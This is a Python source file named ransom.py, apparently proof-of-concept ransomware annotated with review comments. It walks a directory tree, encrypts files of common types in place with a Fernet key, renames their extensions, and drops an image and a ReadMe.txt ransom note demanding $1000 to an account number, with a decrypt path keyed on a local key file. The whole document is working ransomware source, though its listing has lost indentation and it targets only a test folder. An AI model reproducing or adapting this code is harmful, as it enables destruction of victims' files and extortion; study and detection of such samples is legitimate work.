ransom.py
import os
import sys
from os.path import expanduser
from cryptography.fernet import Fernet
import base64
import shutil
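def resource_path(relative_path):
    """Return the absolute path of a bundled resource.

    Works both when run from source and when run from a PyInstaller bundle.

    Args:
        relative_path: Path of the resource relative to the bundle root
            (or to the current working directory when not bundled).

    Returns:
        The resource path joined onto the resolved base directory.
    """
    # PyInstaller unpacks bundled files into a temp folder and records that
    # folder in sys._MEIPASS. Look the attribute up explicitly instead of
    # swallowing every Exception, so unrelated errors are not masked.
    base_path = getattr(sys, "_MEIPASS", None)
    if base_path is None:
        base_path = os.path.abspath(".")
    return os.path.join(base_path, relative_path)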
# Proof-of-concept file encryptor built on cryptography's Fernet (symmetric,
# authenticated encryption). Holds the cipher object and the extension list
# that decides which files are processed.
class Ransomware:
# NOTE(review): the `key` argument is accepted but never stored or used in
# this constructor; self.key is only set later by generate_key()/read_key().
def __init__(self, key=None):
# Fernet instance; stays None until generate_key() or read_key() runs.
self.cryptor = None
# Extensions that crypt_root() will process. The list mixes ordinary
# extensions (txt, png, pdf, exe, zip, rar, jpg) with the replacement
# extensions crypt_file() renames them to (jni, uhg, eft, thu, pok, pjp), so
# the same walk serves both directions. For triage, the replacement
# extensions are indicators of files this script has already touched.
self.file_ext_targets = ['txt','png','pdf','exe','zip','rar','jni','pok','eft','uhg','thu','jpg','pjp']
def generate_key(self):
# Generate a random Fernet key and build the cipher from it.
# Fernet is symmetric: this same key value is what decryption needs later,
# so whoever holds self.key can reverse the encryption.
self.key = Fernet.generate_key()
self.cryptor = Fernet(self.key)
def read_key(self, keyfile_name):
# Load a previously saved key (raw bytes, read in binary mode) and rebuild
# the cipher from it; used on the decryption path.
# NOTE(review): the file content is passed to Fernet() unchecked; presumably
# a malformed or truncated key file makes the constructor raise — confirm.
with open(keyfile_name, 'rb') as f:
self.key = f.read()
self.cryptor = Fernet(self.key)
def write_key(self, keyfile_name):
# Persist the key so a later run can decrypt.
# The key bytes are written as-is, with no wrapping or protection, to a file
# on the same host. For incident response this file is what makes recovery
# possible: preserve it before any cleanup.
with open(keyfile_name, 'wb') as f:
f.write(self.key)
def crypt_root(self, root_dir, encrypted=False):
# Walk root_dir recursively and pass every file whose extension is in
# self.file_ext_targets to crypt_file().
# encrypted=False -> encrypt, then drop the note files in each directory.
# encrypted=True  -> decrypt, deleting .txt/.png files met along the way.
# Text of the note that is written to ReadMe.txt (banner followed by message).
banner="""
88 88 db ,ad8888ba, 88 a8P 88888888888 88888888ba,
88 88 d88b d8'' `'8b 88 ,88' 88 88 `'8b
88 88 d8'`8b d8' 88 ,88' 88 88 `8b
88aaaaaaaa88 d8' `8b 88 88,d88' 88aaaaa 88 88
88aaaaaaaa88 d8YaaaaY8b 88 8888'88, 88''''' 88 88
88 88 d8aaaaaaaa8b Y8, 88P Y8b 88 88 8P
88 88 d8' `8b Y8a. .a8P 88 '88, 88 88 .a8P
88 88 d8' `8b `'Y8888Y'' 88 Y8b 88888888888 88888888Y'' """
message="\nYOUR PC HAS BEEN HACKED\nIF YOU WANT TO GAIN CONTROL\nTRANSFER THE $1000 TO BELOW ACCOUNT NUMBER\n315185351213"
for root, _, files in os.walk(root_dir):
for f in files:
abs_file_path = os.path.join(root, f)
# Skip anything whose extension is not a target. The extension is the text
# after the last '.' of the full path, compared case-sensitively.
if not abs_file_path.split('.')[-1] in self.file_ext_targets:
continue
# In decrypt mode, remove the dropped ReadMe.txt / Hacked.png.
# NOTE(review): the test looks only at the extension, so ANY .txt or .png
# file under root_dir is deleted during decryption, including files created
# after the encryption run. Back such files up before running a decrypt pass.
elif (f.split('.')[-1]=="txt" or f.split('.')[-1]=="png") and encrypted:
os.remove(abs_file_path)
continue
# Hand the file to crypt_file() for in-place encryption or decryption.
self.crypt_file(abs_file_path, encrypted=encrypted)
# NOTE(review): indentation is lost in this listing; presumably the block
# below runs once after the walk above has finished — confirm against the
# original file.
if not encrypted:
# Copy Hacked.png and write ReadMe.txt into every directory under root_dir.
# Both file names are easy indicators for scoping which directories were
# walked.
for root, _, files in os.walk(root_dir):
shutil.copy(resource_path('Hacked.png'),root)
with open(os.path.join(root,'ReadMe.txt'),'w') as f:
f.write(banner)
f.write(message)
def crypt_file(self, file_path, encrypted=False):
# Encrypt (encrypted=False) or decrypt (encrypted=True) one file in place,
# then rename it by swapping its three-character extension.
# Two-way extension map: each original extension maps to its replacement and
# each replacement maps back (txt<->jni, rar<->pok, pdf<->eft, png<->uhg,
# zip<->thu, jpg<->pjp).
# NOTE(review): 'exe' is in file_ext_targets but has no entry here, so the
# lookup on the rename line raises KeyError for .exe files.
change_ext={"txt":"jni","rar":"pok","pdf":"eft","png":"uhg","zip":"thu","jni":"txt","pok":"rar","eft":"pdf","uhg":"png","thu":"zip","jpg":"pjp","pjp":"jpg"}
# 'rb+' opens the existing file for binary read and write; the whole content
# is read into memory at once.
with open(file_path, 'rb+') as f:
_data = f.read()
if not encrypted:
data = self.cryptor.encrypt(_data)
else:
# NOTE(review): presumably raises cryptography's InvalidToken when the
# content was not produced with this key — confirm; nothing here catches it.
data = self.cryptor.decrypt(_data)
# Overwrite in place: empty the file, rewind, write the transformed bytes.
# No copy of the previous content is kept, so an interruption between
# truncate and write leaves the file empty or partial.
f.truncate(0)
f.seek(0)
f.write(data)
# Swap the extension: the last three characters of the path are used as the
# lookup key, and everything before them (including the dot) is kept.
name,ext=file_path[:-3],file_path[-3:]
os.rename(file_path,name+change_ext[ext])
# Entry point. The mode is chosen from the state of the file "keyfile" in the
# current working directory: empty or missing -> encrypt; otherwise -> decrypt
# and then delete the key file.
if __name__ == '__main__':
# The home-directory root is left disabled; the script operates only on the
# relative test directory assigned to local_root below.
# sys_root = expanduser('~')
local_root = '../test/'
Ransom = Ransomware()
# Set to True on the decrypt path so the key file is removed afterwards.
flag=False
'''Ransom.generate_key()
Ransom.write_key('keyfile')
Ransom.crypt_root(local_root)'''
# 'a+' creates the file when it does not exist and never truncates it;
# seek(0) moves to the start so the existing content can be read.
with open("keyfile",'a+') as f:
f.seek(0)
read=f.read()
if read=="":
# No key stored yet: generate one, save it, and encrypt the tree.
print('Encrypting')
Ransom.generate_key()
Ransom.write_key('keyfile')
Ransom.crypt_root(local_root)
else:
# A key is present: load it and reverse the encryption.
flag=True
print("Decrypting")
Ransom.read_key('keyfile')
Ransom.crypt_root(local_root, encrypted=True)
# NOTE(review): indentation is lost in this listing; presumably this runs
# after the with-block has closed the key file — confirm. Once the key file is
# removed, nothing in this script can recover the key.
if flag:
os.remove("keyfile")
'''if sys.argv[1] == 'decrypt':
with open("keyfile",'a+') as f:
f.seek(0)
read=f.read()
if read=="":
print('KeyFile is empty')
else:
Ransom.read_key('keyfile')
Ransom.crypt_root(local_root, encrypted=True)
os.remove("keyfile")
elif sys.argv[1] == '':
Ransom.generate_key()
Ransom.write_key('keyfile')
Ransom.crypt_root(local_root)'''